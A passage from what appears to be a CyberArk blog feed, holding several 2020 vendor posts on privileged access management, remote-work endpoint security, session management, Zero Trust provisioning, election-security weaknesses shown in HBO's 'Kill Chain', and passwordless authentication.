Another NIST guideline focuses on the need for automated mechanisms to assist users in determining whether access authorizations match access restrictions. This is especially important for PII. Privileged access management solutions can integrate with IT service management solutions to enforce security policies in an operationally efficient manner. They do this by triggering the approval processes that authorize access to systems and applications containing PII and elevate privileges to execute tasks within a system or application.

Remote Access

In order to perform their defined tasks, organizations often grant third party companies access to critical internal systems and sensitive information, including PII. Providing remote access through VPNs is a common and valuable solution for a secure connection from outside the network. However, when it comes to providing access to critical business systems and applications, such as ones that manage and store PII, VPNs aren’t designed to provide granular, role-based access.

Remote access solutions aim to solve this problem by leveraging Zero Trust access, biometric multi-factor authentication and just-in-time provisioning so that third parties only have access to the systems they need, and for only as long as they need it.

Least Privilege

It’s a common best practice to only allow access to applications and machines by those who are performing a specified task. Privileged access management solutions help enforce defined access permissions. These solutions are also integral to enforcing the principle of least privilege – that people only have access to what they need to do their jobs and only for a certain amount of time.

Privileged access management solutions remove and manage local admin rights on workstations and servers, approve applications to run and block malware, including ransomware. Unknown applications are able to run in ‘restricted mode,’ which prevents them from accessing corporate resources, sensitive data such as PII or the Internet.

Auditable Events, Reviews, Analysis and Reporting

In order for businesses to comply with multiple regulations, they need to demonstrate that they are correctly managing of PII for audits. Privileged access management solutions enable companies to automatically record and store privileged sessions within a centralized encrypted repository. Prioritize auditing recorded and active sessions with video playback that streamlines reviewing the most suspicious activity.

Identification and Authentication

A crucial step in a strong security program is the ability to identify and authenticate users before accessing critical systems and sensitive PII. Privileged access management solutions help authenticate users and transparently log onto applications using credentials stored and managed in highly encrypted vaults.

These solutions can also integrate with support user accounts and groups of users whose details are stored externally in LDAP-compliant directories and use Active Directory Federation Services (ADFS) to access environments with single sign-on. Equally, leveraging multifactor authentication (MFA) as part of an overall privileged access management program allows organizations to add an extra layer of protection – beyond a password – to better secure systems containing sensitive information.

As organizations continue to grapple with new and emerging regulations, a mature privileged access management program can play a key role in helping to not only protect sensitive PII and comply with these directives, but also to continue to build consumer trust.

Attackers have been very successful (and profitable) over the last 10 years – putting many companies and their security programs to the ultimate test.  As we start this new decade, it’s unlikely that attackers will slow down, but there are tools and technologies to help limit their success.

Want to learn more? Find out how Privileged access management helps meet NIST controls for access management, audit and accountability, and identification and authentication. Or check out the CyberArk Blueprint for simple and prescriptive guidance on how to develop effective and mature privileged access management programs.

]]>
Office Exodus Drives Endpoint (In)Security https://www.cyberark.com/blog/office-exodus-drives-endpoint-insecurity/ Wed, 22 Apr 2020 13:00:32 +0000 https://www.cyberark.com/?p=89535

Around the globe, the rapid, unplanned shift to remote work has tested CISOs’ ability to get employees up and running quickly and demonstrate decisive leadership in the face of uncertainty.

To support workforce productivity and reduce the strain on IT support teams (who are bombarded with calls from employees unaccustomed to remote work), many organizations choose convenience over security out of a perceived necessity.

This is perhaps most evident in the initial lax approach to endpoint security. For example, BYOD use has skyrocketed – regardless of company policy. Further, in many cases, IT and security teams are  granting full local admin rights to employee devices, enabling workers to use various programs, download applications and software, connect and install devices and access corporate systems and information with ease.

While local admin rights promote self-sufficiency, they can also introduce serious risk. Employees trying to navigate their day-to-day tasks from home are downloading unsanctioned applications and unlicensed software en masse without security oversight.

And, as remote users tend to use the same device for work and personal use, they could easily (and unknowingly) execute malicious software as they browse online news sites, launch apps for virtual school sessions or download games to pass the time.

Even worse, with powerful local admin rights at their disposal, cyber attackers or remote employees with malicious intent can do anything from modifying system configurations to changing powerful administrative accounts.

Remote Workers’ Endpoint Devices Are Under Attack. Privileged Credentials Are the Target.

Even without local admin rights, employee devices are a prime target. Attackers know that, out of convenience, people often save passwords in their devices’ credential stores (e.g., Chrome, Firefox and Chromium), chat applications (e.g., Pidgin and Skype), email (e.g., Outlook and Gmail) and even system admin tools (e.g., FileZilla, OpenSSH, VNC and WinSCP).

Using credential harvesting malware like LaZagne, attackers can retrieve passwords for personal web accounts and sensitive company assets alike. After harvesting “low-hanging” passwords quickly and with minimal effort, attackers then work to find privileged credentials and escalate access rights. Once the device is compromised, they can leverage the company’s VPN connection to move laterally, continue to escalate privileges, extend to other parts of the corporate network, and gain access to critical assets and information.

Here’s a look at how easily this can happen:

Employee “John” started working from home in March following a shelter in place order. He was given local admin rights on his laptop that allow him to do things like link his home printer to his device without help desk assistance. This also gives him the freedom to conduct personal online activities without connecting to the VPN.

  1. John logs into his personal email account and opens a message from his bank with his monthly statement. As usual, he clicks “View Statement” and downloads the PDF file.
  2. He tries to open the PDF and is prompted to enter a password. Assuming his bank has amped up security measures during this time of uncertainty, he types in his banking password then clicks on the link to open his statement.
  3. After clicking the link, John is either directed to a corrupted attachment or an invalid web link. As part of this “drive-by download” attack, John has unintentionally downloaded LaZagne. The malware runs behind the scenes to harvest credentials saved in John’s web browser and applications (including credentials to corporate applications and systems). The malware sends these credentials out to the remote attacker or Command and Control server. Here’s what this looks like via a Windows command prompt. But, remember, John has no idea that this just happened.

Pervasive local admin rights, distracted or unaware remote employees and unprotected credentials have created the perfect storm for endpoint attacks. In recent weeks, researchers have recorded a spike in threats tied to the current global situation—from “CoronaVirus” ransomware distributed alongside the “KPot” infostealer, to “Emotet” malware disguised as infection-prevention tip emails, to an APT group spreading a custom remote access trojan (RAT) that takes screenshots of the device, develops a list of files and directories and downloads files – and more.

Enforcing Least Privilege, Credential Theft Protection and App Control Across Remote Workstations

We’re entering the next phase of what many believe will be a permanent shift in the way people work – a new normal. Enhanced situational awareness will quickly advance to risk mitigation within a matter of weeks. Critical steps in this “action” phase will be removing local admin rights and enforcing the principle of least privilege (PoLP) –  that a user should only have the minimum level of access they need to do their job – to contain malware, ransomware and other threats on the endpoint.

This is why solutions like CyberArk Endpoint Privilege Manager are so crucial to an overall privileged access management (PAM) strategy.  Organizations must strike the right balance between security, end user and help desk productivity. By adding a critical protection layer to strengthen existing endpoint security tools like DLP and antivirus/NGAV, CyberArk enables companies to block and contain attacks early in their lifecycle and help prevent data breaches.

Let’s take a look at the above drive-by download attack example again – but this time with CyberArk Endpoint Privilege Manager deployed.

  1. With CyberArk, John must login to his device as a standard business user – without access to local admin rights. He then follows steps 1 and 2 above. CyberArk’s credential theft protection capability blocks unauthorized applications and processes from accessing the device’s software credential stores. This prevents the LaZagne malware from harvesting any credentials. Since John is a standard user, if his credential does fall into the wrong hands, it will be virtually useless for gaining access into the enterprise.

 

  1. When John tries to download an unknown application – for work or for personal use –on his device, CyberArk allows the application to run in a secure ‘restricted mode,’ preventing it from accessing corporate resources, sensitive data or the internet. CyberArk EPM can quickly calculate the application’s risk level and, if it’s categorized as “malicious,” a policy can be created to block it from running.
  1. During John’s remote work stint, security teams can easily enforce least privilege. There are two ways that to achieve this. One method is to leverage CyberArk Endpoint Privileged Manager privilege escalation functionality to elevate the authorized activities and applications based on policies. This covers 80% of the users’ day to day requirement. Endpoint Privileged Manager also offers an ad hoc mechanism which provides more flexibility with just-in-time access and elevation. By adding users to a “privilege group” for a limited time, security can provide an audit trail on the endpoint throughout the temporary period and revoke and terminate access at the end—or before if necessary. This is particularly useful today as organizations redeploy workers to focus on evolving business priorities and need a way to automatically provision and de-provision privileged credentials as responsibilities shift.

Forward-looking CISOs are mapping out their phased approach to risk reduction – not only for the coming crucial weeks, but also the months and years ahead. As we settle into this new normal, employee devices will play an even greater role in conducting business – and introducing new security challenges. In fact, the distributed patchwork of desktop computers, laptops, smartphones and tablets has become our lifeline to the outside world. Now, more than ever, it’s imperative to protect these devices and the access they provide.

Want to learn more about CyberArk Endpoint Privileged Manager? Get started with a free trial. Want to learn more about securing workstations and remote access? Visit CyberArk’s risk distancing resource page.

]]>
Secure Workflows with Native Privileged Session Management https://www.cyberark.com/blog/enabling-secure-workforce-productivity-with-native-privileged-session-management/ Thu, 16 Apr 2020 15:41:50 +0000 https://www.cyberark.com/?p=89302

From user-friendly web apps like Salesforce to IT-centered functions such as Windows Remote Desktop Protocol (RDP), today’s workplace tools can be extremely powerful. While a mix of both modern and traditional tools and technologies can help boost employee productivity and operational efficiency, they also introduce a host of new challenges for security and compliance teams in the form of expanded privileged access.

Privilege Is Everywhere

A privileged user is any user who has the capability to change or impact the operational service of a business process. This includes not only system administrators, but also users you may not intuitively consider “privileged.” Privileged access extends to applications, machines and service accounts connecting to other systems, as well as software robots as part of robotic process automation (RPA) workflows.

As enterprises shift more workloads to the cloud, double down on digital transformation initiatives and increasingly automate processes, the number of privileged users and accounts grows and the potential attack surface continues to expand. Each step forward creates new “doors” that must be locked.

Yet, too often, locking many of these “doors” is overlooked by organizations as they forge ahead, often focused on driving business agility. RPA and application credentials are often highly privileged, giving broad access to sensitive data and systems. When these credentials are not properly secured, they can open up the enterprise to unnecessary risk. Unfortunately, attackers understand this, and increasingly target these unprotected entranceways—seeking out powerful, unsecured credentials to accomplish their goals.

So how can you continue to innovate and evolve in this digital landscape—and do it securely? And how do you lock all of these “doors” to stay secure, without slowing down productivity? For many organizations, this can seem like an insurmountable challenge. That’s where native privileged session management comes in.

Benefits of Native Privileged Session Management

When you secure privileged accounts on both the user and system access levels, you limit the ability for an external attacker or malicious insider to use compromised credentials to bypass monitoring solutions and security controls. To do this effectively across on-premises, hybrid and cloud environments, you must identify the right tools that can not only mitigate risk, but also allow employees to keep using the tools they want—and need—to do their jobs.

Privileged session management is a foundational component of any privileged access management (PAM) program—giving organizations the ability to:

  • Prevent cyberattacks by isolating end users from sensitive target machines.
  • Create accountability and control over privileged session access with policies, workflows and privileged single sign-on capabilities.
  • Deliver continuous monitoring and compliance with session recording without leaving a footprint on target machines.

With its advanced privileged session management capabilities, the CyberArk Privileged Access Security Solution provides end users the freedom to work with their favorite native tools and workflows, while simultaneously preventing credential exposure, isolating critical assets, automatically recording sessions and sorting sessions by risk to improve auditor productivity. We recently demonstrated a series of native deployment options, which include:

  • Access to all systems and apps from the CyberArk web interface
  • Native access for SSH and Windows admins
  • Native access for cloud admins and privileged business users

Following are highlights from the demonstration. To explore additional use cases, check out our on-demand webinar: Enable Secure Productivity with Native Session Management.

Workflow 1: CyberArk Privileged Session Manager for Windows

We provide several options for establishing secure session connections for Windows: RDP Files, ActiveX, HTML5 Gateway and native access with the RDP Proxy. Based on user experience preferences, security considerations and industry regulations, organizations can choose which option works best for their environment.

Here’s a brief look at how to establish secure sessions via RDP.

Figure 1: CyberArk Privileged Session Manager for Windows 

 

Workflow 2: CyberArk Privileged Session Manager for SSH

CyberArk Privileged Session Manager for SSH enables organizations to secure, control, monitor and audit privileged access to things like network devices. It integrates with Microsoft Active Directory (AD) to provision users transparently on UNIX and Linux systems, streamline user management and reduce administrative overhead—without interrupting user workflow.

Privileged Session Manager for SSH can also restrict unauthorized commands executed by a privileged user on a network device or any SSH-based target system.

Similar to traditional Privileged Session Manager, this solution separates end users from target machines and initiates privileged sessions without divulging passwords or keys. Privileged Session Manager for SSH can also display a broad overview of all activity performed on every privileged account. All activities are fully monitored to help support strict auditing standards. Finally, the solution enables organizations to identify high-risk privileged sessions in real time, automatically suspend or terminate these sessions and initiate automatic credential rotation.

Here’s how it works.

Figure 2: CyberArk Privileged Session Manager for SSH

 

Workflow 3: CyberArk Privileged Session Manager for Web

CyberArk Privileged Session Manager for Web provides true native, secure access to all major cloud platforms and web applications.

Organizations can trace user actions by creating a record of activity on cloud console administrative accounts, business critical applications like Salesforce and DevOps tools like OpenShift. Actions are traced directly back to individual authorized users to ensure accountability. This also helps identify weak areas of security and rogue employees that may be performing malicious activities. As with all CyberArk Privileged Session Manager use cases, organizations can assign risk scores to cloud console sessions and automatically alert security operations teams on high-risk activities.

The CyberArk solution supports all major cloud consoles and, with our Universal Connector Generator, organizations can easily create a web connector to support other platforms and custom—or proprietary—applications.

Let’s look at the workflow.

Figure 3: CyberArk Privileged Session Manager for Web

 

With CyberArk, you can implement secure, native access to Windows, UNIX and Linux, cloud, SaaS and web applications, social media and more. Learn more about unifying risk-based session review, mitigation and audit across hybrid environments while maximizing user productivity in our on-demand webinar or by requesting a demo.

]]>
“Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma. https://www.cyberark.com/blog/should-i-stay-or-should-i-go-artificial-intelligence-and-the-clash-has-the-answer-to-your-employee-access-dilemma/ Tue, 14 Apr 2020 20:02:42 +0000 https://www.cyberark.com/?p=98933

What happens when employees have access to data, apps or services that they shouldn’t? Best case scenario: they might know the salaries of all their colleagues and company execs. Worst case scenario: malicious actors exploit that access and extract sensitive business data, causing millions of dollars in damage and irreparable harm to brand reputation.

In past blogs, I wrote how security starts with protecting users and that by verifying the user we greatly reduce the attack surface from “all humans” to just those you actually trust (aka your employees). I also wrote that we want to make sure every device is being used in a secure manner. In other words, by validating every device, we reduce the attack surface even more by limiting the devices that gain access from billions of computers, phones, or tablets to just the select few in the user’s possession.

Verifying users and validating devices represent steps one and two on the road to Zero Trust. But while this combination drastically improves security posture, more layers are necessary to guarantee risks of fraudulent access are no more. Just because a person is who they say they are — and are using a trusted device — doesn’t mean that they should have broad access rights beyond what they need to do their job. Whether by accident or malicious intent, insiders can still misuse their access — or share access with people whom they shouldn’t.

To stop this from happening, you need to vastly reduce the risk associated with the access rights each user has. We do this by limiting user access (even to verified users and validated devices) to only those apps and resources that they need to do their job, and to only when they specifically need to do it. This is step number three that completes the trinity of a Zero Trust security approach: “Verify every user, validate their devices, and intelligently limit their access.”

“One day it’s fine, the next it’s black.” (The accumulation of access creates huge dangers.)

Companies typically grant access to necessary apps and resources as they onboard employees.  When an employee moves on, either up the ranks or out the door, we tend to forget about those original grants. We’re all guilty of this. For example, I’m now head of marketing at Idaptive, so I shouldn’t have access to our product source code the same way I did back when I was a product manager. The accumulation of access to data, apps, and services creates serious risks. Instead, we must tailor that access to just what a person needs for the job they perform today — and automatically remove that access when they leave.

That’s easier said than done for IT teams (and sometimes HR) who historically had to manually provision and deprovision users — or at least manually write the rules for role-based access control programs. Someone had to tell IT that an employee’s role had changed, and then IT would have to figure out how that relates to the access that they should or shouldn’t have. We often refer to this process as “lifecycle management,” and provisioning is just one piece of this mammoth responsibility that enterprise teams are tasked with managing.

The role of lifecycle management in the Zero Trust model is critically important because it determines who has which rights on which systems and applications. You can ensure that a user only has access to what he needs to do his job, create reliable reports, and audit those rights at any given time.

IT staff knows that accounts are difficult to manage because:

  1. Employees are often given more access than they need.
  2. Access frequently follows them through the course of their tenure at an organization.
  3. They amass more and more rights over time — even as their positions and roles change.
  4. Unused accounts and accounts for employees and other users who no longer need them also tend to stay around longer than they should.

Some form of automation and automatic deprovisioning is required. Combining self-service, workflow, and provisioning automation can ensure that users only receive the access they need, help them be productive quickly, and automatically remove their access as their roles change or when they leave the company.

Even if you don’t have hands-on experience with lifecycle management, it’s not hard to see how this spreadsheet-style or “swivel chair” provisioning access can snowball into something both time-consuming and error-prone — leading to an accumulation of access over time. And when employees have access to things they shouldn’t, attackers know that a simple phishing attempt is all it takes to gain insider access and wreak havoc on business systems.

“You Gotta Let Me Know.” (Provisioning and Lifecycle Management enhances visibility and control.)  

If you’re saying right now “there has to be a secure, more efficient and maybe even automated way to do this,” you’d be right. The answer lies within a Zero Trust approach powered by Next-Gen Access identity technology.

With Provisioning and Lifecycle Management you can enable users to request access to applications from the app catalog of pre-integrated applications, provide specific users the ability to approve or reject these access requests, and automatically create, update, and deactivate accounts based on roles in your user directory.  Provisioning enables users to be productive on day one with the appropriate access, authorization, and client configuration across their devices.

Lifecycle Management should also seamlessly import identities from your preferred HR system or application, including Workday, UltiPro, BambooHR, or SuccessFactors, and provision them (typically) to Active Directory. This enables you to unify your provisioning and HR workflows and have an HR-driven primary system of record for user data across all your applications.

By way of example, with Active Directory (AD) synchronization for Microsoft Office 365, you can keep your AD accounts and Office 365 accounts in sync and automatically provision and deprovision user accounts, groups, and group memberships to simplify Office 365 license management.

Lifecycle Management not only can save IT teams a great deal of time and frustration, but it can ultimately save companies from crippling data breaches. Such is the power of intelligently limiting access as part of a Zero Trust framework.

 

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
HBO’s Kill Chain Shows Weaknesses in U.S. Election Security https://www.cyberark.com/blog/hbos-kill-chain-documentary-exposes-key-weaknesses-u-s-election-security/ Tue, 14 Apr 2020 13:49:15 +0000 https://www.cyberark.com/?p=89173

Are America’s elections safe from cyberattacks? The answer, according to HBO’s recent documentary Kill Chain: The Cyber War on America’s Elections, is a resounding no.

Kill Chain examines past cyberattacks on election infrastructure, as well as vulnerabilities in voting systems that are slated for use in 2020 federal, state and local elections. The documentary follows cybersecurity researchers, U.S. politicians, and even attackers who have hacked systems used in previous elections. Collectively, the experts agree: current U.S. election technology is immensely vulnerable.

A key weakness that is highlighted time and time again: Unsecured privileged access to election systems. Exploitation of privileged credentials is one of the most widely utilized attack vectors in cyberattacks today. And the reason is simple. Once attackers have a foothold into the network, they can use these credentials to escalate privileges and move laterally. In the case of IT infrastructure supporting elections, an attacker could gain access to a single computer and infect additional machines – eventually being able to execute a complete network takeover.

As someone with a strong professional and personal interest in cybersecurity, this documentary really emphasized the need for better security and data privacy education, not just in our elections but also in daily life. Several of the identified attacks could have been prevented by following basic cybersecurity best practices. For those of you who haven’t seen the documentary, I’ll be cautious of spoilers, but let’s dig into how privileged access management solutions can protect against the weaknesses of U.S. election technology.

Prevent Credential Theft – The Entry Point of the 2016 Election Assistance Commission Breach

In December 2016, the Election Assistance Commission (EAC), the federal government organization overseeing election security, revealed that its database had been breached by attackers affiliated with a nation-state.

Stolen privileged credentials from an EAC administrator were the attacker’s entry point. Kill Chain interviews the administrator whose credentials were used to access EAC systems, who claims he may have been targeted for credential theft since he was “the new guy,” having just joined EAC. While user management and onboarding tasks can be intensive workloads, securing the privileged credentials of new employees is essential to the success of any privileged access management (PAM) program.

Modern privileged access management solutions can secure and automatically rotate privileged credentials and isolate them to help prevent credential theft. Automatic discovery capabilities can also help ensure all privileged accounts are managed through the solution, including the onboarding of new employees and revoking privileges of former employees.

Stop Lateral and Vertical Movement – The Dangers of a Nation-State Attack

Kill Chain makes the point that once nation-state attackers had a foothold in the EAC database, they were able to move laterally to the server hosting all election data. Once in control of this server, they could wipe all voting data, essentially rendering the election meaningless.

In this case, the attacker downloaded voting data and sold it to the highest bidder, another foreign government. But effectively, the EAC’s lack of controls rendered our election systems vulnerable to multiple foreign actors. As the EAC administrator stated, once in control of the server, “they can do whatever they want to that database.”

Elsewhere, Kill Chain points out that despite frequent claims otherwise, voting systems are heavily networked. Nationally, voter registration is linked to the internet for easy enrollment, while voting machines communicate on LAN networks that are heavily susceptible to attack. Lateral attacker movement between these machines could compromise entire polling centers, allowing less sophisticated attackers like or organized crime groups to manipulate their local elections.

Privileged access management best practices can enhance election security by helping stop lateral and vertical movement. Session isolation capabilities can limit a compromised credential’s range of motion to a single system, session monitoring provides visibility into privilege-related activity and automatic credential rotation capabilities notably constrain an attacker’s window of opportunity. Finally, privileged access management can support Zero Trust frameworks and just-in-time privilege elevation to allow users to access privileged accounts only on a temporary, as needed basis.

Limit Privilege Escalation and Abuse – Securing the Local Election Infrastructure

One of the most interesting parts of Kill Chain is an interview with one anonymous attacker who successfully escalated privileges to gain root access to Alaska’s main election server in the 2016 federal election. The attacker claims that once in control of the server, he “felt like God,” and could have changed live voting data or even removed candidates from the ballot. The documentary even hints the attacker may have intended to use Alaskan systems as a steppingstone to federal systems.

The documentary stops short of making this accusation, but the point is clear: U.S. election security infrastructure fails to contain privilege escalation.

Elsewhere, Kill Chain explores the various vulnerabilities of the three most popular voting systems, which run on woefully out-of-date operating systems like Microsoft Windows 7.* The documentary even cites a U.S. Air Force penetration tester who specifically names easy privilege escalation as an unforgivable vulnerability of one vendor’s polling computers.

Privileged Access Management solutions that reinforce the principle of least privilege, in which each privileged account is granted only necessary permissions – no more and no less – is a good starting point. Further, privileged threat analytics can automatically detect anomalous activity and alert and trigger an automatic response to high-severity incidents and take remedial actions to stop attacks.

While Kill Chain, which ultimately argues for paper ballots, makes it clear there are significant U.S. election security threats outside of the realm of privileged access management, the documentary makes it clear that better privilege-related controls are needed across American election infrastructure. And while this documentary focused solely on election security, these attacks could very easily translate into any business that holds sensitive data. No matter the organization, a modern privileged access management program is essential to developing a strong cybersecurity posture.

Interested in learning more? Check out the CyberArk Blueprint for Privileged Access Management Success with this white paper and on-demand webinar.

*Note: Microsoft has adjusted its end-of-support for Windows 7 to protect machines used in the 2020 election cycle.

]]>
Tackling the Cybersecurity Challenges of Our “New Normal” https://www.cyberark.com/blog/tackling-the-cybersecurity-challenges-of-our-new-normal/ Thu, 09 Apr 2020 12:58:26 +0000 https://www.cyberark.com/?p=88844

Within one short month, “business as usual” has become anything but. Millions of workers have shifted to remote work, been redeployed to focus on evolving business priorities, or face general uncertainty about their jobs. As IT teams work around the clock to execute business continuity plans, cyber attackers have been working just as hard and fast to exploit weaknesses in these dynamic and changing environments.

Through my regular conversations with tech leaders, it’s clear that staying ahead of known and emerging threats in this new landscape has added even more levels of complexity to an already complicated job. CIOs and CISOs at organizations everywhere are looking for the best way to handle these challenges while keeping employees safe and productive. As they navigate this “new normal,” there are three fundamental areas that are emerging as key priorities for security leaders across critical people, process and technology dimensions:

Securing People

While remote work was growing in popularity before it became a necessity, there are still many people across industries like government, finance and education who have never had to work like this before. They’re now forced to navigate a completely different way of getting their jobs done. At the same time, they’re “homeschooling” their kids, caring for aging parents, poring over the internet for the latest news on the unfolding situation and trying to snag an elusive time slot for grocery delivery. Needless to say, with everything else on their minds, security can be an afterthought—and attackers know this. Attackers have launched a wave of phishing, ransomware and social engineering campaigns taking advantage of the confusion and distraction. Some cyberattack attempts are seemingly work-related—like a phony email from IT asking the user to click on a link as part of a set-up process—while some make emotional appeals looking for support of a “noble cause” or use government stimulus or other financial incentives as the hook.

Securing Devices and Applications

IT teams had very little (if any) time to prepare for the acute spike in remote workers. Some employees were able to take their office computers home with them while others set up shop with their own technology. This surge in new and personal device use has created a host of new challenges, particularly for those organizations that did not have an existing BYOD policy in place. In the rush to get connected, misconfigurations abound and leaving new devices in their default (insecure) factory settings can put companies at risk. Attackers look for these situations to gain a foothold into the organization.

In addition, as we rely more than ever on messaging and conference calling applications to keep us connected, attackers are exploiting vulnerabilities in these systems too. Whether it’s “Zoombombing” attacks—where uninvited attendees break into and disrupt Zoom meetings—or targeting application credentials stored within web browsers, compromising popular web-based applications has become a dangerously organized effort by attackers.

Securing Connections and Access

According to a CNBC survey, 53 percent of organizations have never stress-tested their systems for an event like this. Many organizations face both security and availability challenges as hundreds of thousands of employees try to connect using virtual private networks (VPNs) to send and receive data. Compounding the issue, employees logging into their VPNs are using home WiFi networks, which are often unsecured, unmonitored and overloaded as multiple people try to work and learn remotely. Attackers can easily infect these WiFi routers with malware, making all of the household’s connected devices vulnerable—from TVs and smart thermostats to cell phones and computers.

Beyond just providing access to servers and systems for the average employee, many others need access to sensitive information and data to do their jobs. While this is particularly true of traditional roles—like IT admins who require powerful privileged access to critical systems—the number of privileged users continues to widen as employees from departments like finance and legal also need access to cloud consoles, RPA consoles and orchestration tools.

As the definition of a privileged user expands rapidly, security teams struggle to maintain visibility of what these users access—at what time and for how long—from various remote work locations. Meanwhile, many organizations have shifted responsibilities and deployed workers to perform additional or different tasks to help cover departments that may be short-handed. Some of these workers have been given elevated privileges that they’ve never had before—often without the requisite security policies in place, like automatically provisioning and de-provisioning credentials. This makes it easy for attackers to exploit the access typically granted to a powerful insider, using it to launch and execute attacks and potentially gain control over all infrastructure.

While the security issues CISOs collectively face today are not new, they are more acute than ever before. While we often talk about this “new normal” as temporary, it is very likely that it will persist long after the current situation has dissipated. Employees unaccustomed to working from home may recognize the benefits and balance remote work can bring to their lives. Similarly, their employers may realize operational efficiencies, productivity gains and employee empowerment opportunities, and allow—or even encourage—more remote work.

No matter what the future holds, the actions taken by organizations today will inform what our collective tomorrow looks like. Start by remaining hyper-vigilant and maintaining strong cybersecurity practices. From there, you can begin planning for the long game by redefining how to approach risk across people, processes and technologies.

One of the most effective places to start when it comes to risk management is managing access to privileged accounts and credentials. The greatest risk organizations face is – contrary to popular belief – containing attackers who are already inside the system, not preventing the initial infiltration. By engaging in privileged access management, organizations can keep their most valuable data secure – regardless of whether they’re workers are in the office or at home.

To learn more, read “5 Reasons to Prioritize Privileged Access Management (PAM)” or visit CyberArk’s risk distancing resource page.

]]>
True Passwordless? Show me… https://www.cyberark.com/blog/true-passwordless-show-me/ Tue, 07 Apr 2020 18:09:30 +0000 https://www.cyberark.com/?p=99525

Passwordless is more than a buzzword. Idaptive has been granted a key patent in Passwordless technology by the United States Patent Office: Zero sign-on using a web browser.

Passwordless is a major security industry buzzword for 2020. I’m sure you have heard many identity and access management vendors touting their Passwordless technology in their blogs, press releases, and conferences as being the first to market.  If I was from Missouri, the “show me” state, I would insist that vendors show real innovation — more than just supporting common Passwordless authentication standards.

One of our core values at Idaptive is to back up our claims with true innovation and real intellectual property, and this last weekend brought a really nice surprise for us here at Idaptive; we have been granted a key patent in Passwordless technology by the United States Patent Office: Zero sign-on using a web browser.

Zero Sign-on (ZSO)

This patent for Zero Sign-on (ZSO), implemented in the Idaptive Next-Gen Access platform, is about eliminating passwords while delivering strong authentication to login to any application, cloud or on-premises, through a web browser using user and device certificates. This innovation leverages two core pieces of the Idaptive platform – the cloud service, and the cloud agents.

To summarize, this is how it works; when a user on the device enrolls the device with the Idaptive platform, the Idaptive cloud endpoint agent configures all standard browsers on the device to enable ZSO via each standard browser installed on the device. After configuration, any of the browsers can create an authenticated secure connection to Idaptive platform (and any application protected by it) without need for user to enter in their credential information such as a username or password. From the user’s point of view, the user simply requests the application in the browser and accesses it with no further input, enabling a seamless, or “silent”, login experience with the underlying security controls offered by strong certificate-based authentication.

The foundational pillars of Passwordless

In the past year or so, I’ve had the opportunity to have many discussions with our customers and prospects about what constitutes a true Passwordless solution, and the foundational pillars of such a solution. Here’s my view on what are the foundational pillars of a true Passwordless solution.

Pillar 1: Zero Sign-on with Passwordless multi-factor authentication

The first pillar of a true Passwordless solution is Zero sign-on, leveraging strong cryptographic standards such as certificates and combining user identities with contextual information such as device fingerprints and security posture. But ZSO, alone, is not enough. ZSO needs to be combined with one or more additional authentication factors, none of which should be passwords. With Idaptive, you can implement ZSO and layer on additional forms of authentication, such a mobile-push notification, Yubikeys of even FIDO 2 supported on-device authenticators such as TouchID and Windows Hello (hopefully not SMS OTP). In highly secure environments where privileged users are not allowed to plug-in USB keys or devices, nor have other devices such as fingerprint sensors or cameras enabled on their endpoints, ZSO may be the only real form of high assurance, cryptographic, Passwordless authentication you have available.

Pillar 2: FIDO 2 support and integration

Pillar #2 for Passwordless is Fast Identity Online (FIDO). I’m a great fan and supporter of the FIDO alliance, and it seems, so is our industry! Most every identity as a service vendor supports FIDO 2 Web Authentication (WebAuthN) and this standard is key to enabling Passwordless authentication to typical end user machines. I’ve personally loved using FIDO 2 compliant keys from Yubikey and using my MacOS TouchID to access my Idaptive secured applications and Idaptive user portal. I also use my FIDO 2 keys as an additional factor when step-up authentication is triggered. For example, Idaptive can require multi-factor authentication when the risk level is determined to be elevated by my behavior, such as accessing an app that I haven’t used recently or from a location I don’t normally access it from.

Pillar 3: Endpoint Agent for Passwordless multi-factor authentication

The third pillar of true Passwordless is login authentication to endpoints. While technologies like Windows Hello, which Idaptive works seamlessly today, have made it easier to eliminate passwords during endpoint login, they often come with their own share of challenges; for one, they replace the password with a PIN, which is just as easy to forget and prone to being reused for personal and corporate logins; second, they do not provide a versatile and wide range of Passwordless authenticators to work with; and third, they further lock you into using and paying a premium for Microsoft technologies, which only work on Microsoft platforms (what about all those Macs?). While the Idaptive endpoint agents require password as one of their factors today, this restriction will be removed in the future releases. In other words, Idaptive will enable login to your windows and mac endpoints with no passwords!

Pillar 4: Remote users Passwordless authentication to on-premises apps

Pillar number 4 is a key Passwordless use case that affects all hybrid enterprises, especially in today’s work from home environment. Remote users often use a VPN connection into the network to access on-premises applications and resources. As a key security control, you should always require users to use multi-factor authentication (MFA) when accessing the network through a VPN. Making sure this MFA is Passwordless is a key element of enabling a Passwordless environment.

NOTE: Widespread VPN usage introduces its own security and scale challenges, especially when a typical user only needs access to a handful of applications. That is why Idaptive offers VPN-less access through its App Gateway service, and you can leverage Idaptive’s ZSO and FIDO 2 support with this service to achieve true Passwordless authentication to on-premises apps.

Pillar 5: Self-service Passwordless Authenticator replacement

The last pillar of Passwordless, is a solution that will offer you the ability to self-enroll, replace and delete your Passwordless authenticators with the appropriate security controls, along with a wide variety of alternative Passwordless authenticators to choose from.  If a user were to lose their YubiKey, or misplace their mobile phone, they shouldn’t be dead in the water.  A true Passwordless solution will offer you the ability to self-enroll, replace and delete your Passwordless authenticators with the appropriate security controls, and provide a wide variety of alternative Passwordless authenticators to choose from.

